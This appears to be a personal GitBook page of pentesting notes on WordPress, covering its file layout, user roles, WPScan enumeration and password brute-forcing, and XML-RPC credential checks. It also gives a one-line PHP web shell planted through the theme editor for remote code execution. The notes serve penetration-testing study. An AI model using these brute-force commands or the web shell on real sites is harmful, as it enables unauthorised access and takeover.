Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
Powered by GitBook
On this page
  • WordPress Structure
  • WordPress User Roles
  • WPScan
  • Basic Scan
  • Enumerate Plugins using WPScan
  • Enumerate Users using WPScan
  • WPScan Aggressive Mode Plugins
  • ALL in ONE WPSCAN Command
  • Normal WPSCAN Bruteforce Attack
  • BruteForce attack using WPScan
  • RCE using ThemeEditor
  • XMLRPC.php
  1. CMS Pentesting

Wordpress Pentesting

WordPress Structure

.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php

WordPress User Roles

There are five types of users in a standard WordPress installation.

Role
Description

Administrator

This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.

Editor

An editor can publish and manage posts, including the posts of other users.

Author

Authors can publish and manage their own posts.

Contributor

These users can write and manage their own posts but cannot publish them.

Subscriber

These are normal users who can browse posts and edit their profiles.

WPScan

Basic Scan

wpscan --url http://127.0.0.1

Enumerate Plugins using WPScan

 wpscan --url http://94.237.49.182:58555/ --enumerate ap

Enumerate Users using WPScan

wpscan --url http://94.237.49.182:58555/ --enumerate u

WPScan Aggressive Mode Plugins

wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 60

ALL in ONE WPSCAN Command

wpscan --url target.com --disable-tls-checks --api-token <api-token> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force

Normal WPSCAN Bruteforce Attack

wpscan --url http://example.com --passwords /usr/share/wordlists/rockyou.txt

BruteForce attack using WPScan

WPScan can be used to brute force usernames and passwords. The scan report returned three users registered on the website: admin, roger, and david. The tool uses two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method will attempt to brute force the normal WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it is faster.

wpscan --password-attack xmlrpc -t 20 -U admin, david -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com

RCE using ThemeEditor

we need to login as Administrator on WordPress Portal, then you need to go to theme editor page

edit the 404 theme and add the reverse shell in it

or you can also add the below code as well

<?php
system($_GET['cmd']);
?>

now save it and visit the below url to access it and execute it

http://<target>/wp-content/themes/twentyseventeen/404.php

and we have successfull RCE.

XMLRPC.php

It is important to note that xmlrpc.php being enabled on a WordPress instance is not a vulnerability. Depending on the methods allowed xmlrpc.php can facilitate some enumeration and exploitation activities, though.

if we have a username and password for the admin user we can try to get the information utilizing the xmlrpc.php 

curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
PreviousPentesting Redis 6379NextJenkins

Last updated 20 days ago